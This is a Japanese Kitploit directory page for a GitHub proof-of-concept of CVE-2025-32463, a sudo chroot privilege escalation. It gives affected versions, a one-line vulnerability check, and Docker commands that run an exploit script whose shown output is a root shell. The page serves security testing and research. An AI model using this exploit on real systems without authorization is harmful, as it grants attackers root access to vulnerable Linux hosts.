Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32463_chwoot — chrootオプション付きsudoバイナリを介したrootへの特権昇格。CVE-2025-32463 | Kitploit
ツール/GitHubGitHub/pr0v3rbs/cve-2025-32463_chwoot
特権昇格脆弱性分析エクスプロイトペネトレーションテストレッドチーミングコンテナエスケープ
GitHubpr0v3rbs/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

chrootオプション付きsudoバイナリを介したrootへの特権昇格。CVE-2025-32463

リポジトリを見る
525959ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32463 – sudo chroot("chwoot")のPoC

このリポジトリは、sudo の chroot 機能における CVE‑2025‑32463 権限昇格の脆弱性を実証するための、最小限かつ再現可能な環境を提供します。

  • この脆弱性は、Rich Mirch(X: @0xm1rch)氏により Stratascale に報告されました。
  • 元の投稿: 脆弱性アドバイザリ: Sudo chroot の権限昇格
  • NVD: CVE-2025-32463(CVSS 9.3)

影響を受けるバージョン

ほとんどの Linux ディストリビューションにおいて、sudo 1.9.14 から 1.9.17(すべての p リビジョン)までの脆弱なビルドが影響を受けます。

セキュリティページ

  • Ubuntu(CVSS 9.3)
  • Redhat(CVSS 7.8)
  • SUSE(CVSS 7.8)
  • Debian

内容

ファイル目的
Dockerfile脆弱な sudo 1.9.16p2 とビルドツールを含む Ubuntu 24.04 イメージを構築します
sudo‑chwoot.shchroot 内で root シェルを起動する PoC エクスプロイト
run.shイメージを(必要に応じて)構築し、エクスプロイトコンテナを起動するヘルパースクリプト

クイック脆弱性チェック

root@kitploit:~
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot

Docker コンテナでエクスプロイトをテスト

root@kitploit:~
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot

# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh

# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#

run.sh は Docker に --privileged と --rm を渡すため、コンテナは終了時に自分自身をクリーンアップします。


クリーンアップ

作業が終わったらイメージを削除します:

root@kitploit:~
docker rmi sudo-chwoot

参考

  • Stratascale CRU の脆弱性ノート: 脆弱性アドバイザリ: Sudo chroot の権限昇格
ツールをダウンロード